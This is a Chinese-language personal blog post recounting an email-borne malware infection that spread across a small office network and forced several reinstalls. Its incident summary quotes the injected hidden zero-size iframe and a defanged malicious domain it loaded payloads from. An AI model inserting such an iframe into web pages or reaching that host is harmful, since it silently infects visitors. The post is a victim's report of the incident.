ezPOST

真是倒霉啊！老人昨天下午上網時，突然發現在 google 首頁左上角有一個怪怪的小黑點，只有用 firefox 才看的到，ie 看不到它，而且發現狀態列竟然在跑一個奇怪的網址 aaa.369678.cn 及 48.db.51.1a，雖然很快的就發現狀況不妙，但是已為時已晚，才短短不到 15 秒的時間，老人知道自己的 IBM T43(2668-O2V) 已經中毒被駭了～而且接著整個網段的電腦也跟著都掛了～不是「慘烈」所可以形容的。

最後發現原因是出在一封大陸的信件，原來是副總剛從大陸回來，請同事幫他收信～結果當其中一封信開啟後，就是災難的開始囉；共計受到的電腦有五部，最後因為都無法完全根治毒源，所以都只好重灌了。還好我自己用的電腦都有 .gho 的備份檔，可以很快還原系統的基本環境；不過有兩次才剛還原就立刻中毒，就像是以前快速散播的「疾風」，但卻又比它更麻煩，所以花了一番功夫才搞定所有的電腦。

話說回來，這次中毒怎麼會這麼嚴重呢？我也覺得很驚訝，其實老人平常很重視系統的安全性，但最後卻因為「人為因素」受到波及；這次的中毒被駭事件，實在也搞不清楚是到底中了多少隻毒，連 KAV,AVS,AVG Pro,AVG Spyware,AntiVir,Ad-Aware 等都束手無策。而且也查過註冊檔、系統程序、安全模式...經過兩三個小時的檢測，老人所有的絕招都用光的情況下，最後只好向「一堆毒物」投降。

事件概要：

• 只要開網頁，無論是哪一種瀏覽器、哪一首頁，網頁的原始碼中都直接被植入 [iframe src='hxxp://aaa.369678.cn/ppp.htm' width=0 height=0][/iframe]
• 左上角有一個怪怪的小黑點，但只有用 firefox 才看的到，ie 看不到它；狀態列會連接網址 aaa.369678.cn 及 48.db.51.1a
• 連到 aaa.369678.cn 後，就有一堆東西不斷的被下載產生，諸如 jsp, js, asp, exe, htm 等不斷在 Temporary Internet Files 被生成。
• 多種防毒防駭工具都無效，而且每部電腦的情況都有一點不同，真是難以形容～
• 上網找 aaa.369678.cn，可以找到一些相關的舊資料，以這些資料來看，只是低風險、很容易解決的東西；實在不像是這次落難的情況～